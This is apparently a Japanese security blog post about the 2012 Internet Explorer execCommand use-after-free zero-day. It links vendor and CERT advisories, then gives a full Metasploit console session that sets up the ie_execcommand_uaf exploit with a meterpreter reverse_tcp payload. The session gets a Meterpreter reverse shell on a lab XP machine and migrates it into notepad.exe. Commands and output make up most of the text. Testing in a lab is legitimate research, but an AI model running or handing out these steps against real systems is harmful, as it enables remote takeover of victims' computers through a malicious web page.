http://isc.sans.edu/diary/IE+Zero+Day+is+For+Real+/14107
http://jvn.jp/cert/JVNVU480095/index.html
9月21日には修正パッチがリリースされるとのこと
http://www.ipa.go.jp/security/ciadr/vul/20120920-windows.html
Metasploit のモジュールとしても提供されていたので確認してみる
https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit
http://www.metasploit.com/modules/exploit/windows/browser/ie_execcommand_uaf
以下、XP+IE8 での検証結果
msf >とりあえずは成功
msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_execcommand_uaf) > show options
Module options (exploit/windows/browser/ie_execcommand_uaf):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on th
e local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly gene
rated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted:
SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ie_execcommand_uaf) > srvhost 192.168.1.84
[-] Unknown command: srvhost.
msf exploit(ie_execcommand_uaf) > set srvhost 192.168.1.84
srvhost => 192.168.1.84
msf exploit(ie_execcommand_uaf) > set lhost 192.168.1.84
lhost => 192.168.1.84
msf exploit(ie_execcommand_uaf) > set srvport 80
srvport => 80
msf exploit(ie_execcommand_uaf) > set lport 8080
lport => 8080
msf exploit(ie_execcommand_uaf) > set uripath test
uripath => test
msf exploit(ie_execcommand_uaf) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.84:8080
[*] Using URL: http://192.168.1.84:80/test
[*] Server started.
msf exploit(ie_execcommand_uaf) > [*] 192.168.1.51 ie_execcommand_uaf - Mozilla/4.0 (compatible
; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath
.1)
[*] 192.168.1.51 ie_execcommand_uaf - Redirecting to Pjeam.html
[*] 192.168.1.51 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51 ie_execcommand_uaf - Loading Pjeam.html
[*] 192.168.1.51 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] 192.168.1.51 ie_execcommand_uaf - Loading VKxmjc.html
[*] 192.168.1.51 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CL
R 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
[*] Sending stage (752128 bytes) to 192.168.1.51
[*] Meterpreter session 1 opened (192.168.1.84:8080 -> 192.168.1.51:2725) at 2012-09-20 22:30:40 +
0900
[*] Session ID 1 (192.168.1.84:8080 -> 192.168.1.51:2725) processing InitialAutoRunScript 'migrate
-f'
[*] Current server process: iexplore.exe (11744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 11780
[+] Successfully migrated to process
msf exploit(ie_execcommand_uaf) >
msf exploit(ie_execcommand_uaf) >
他にもいくつか試してみたが、うまく行かない場合もあった
成功率はJAVAのほうがよさそうな印象
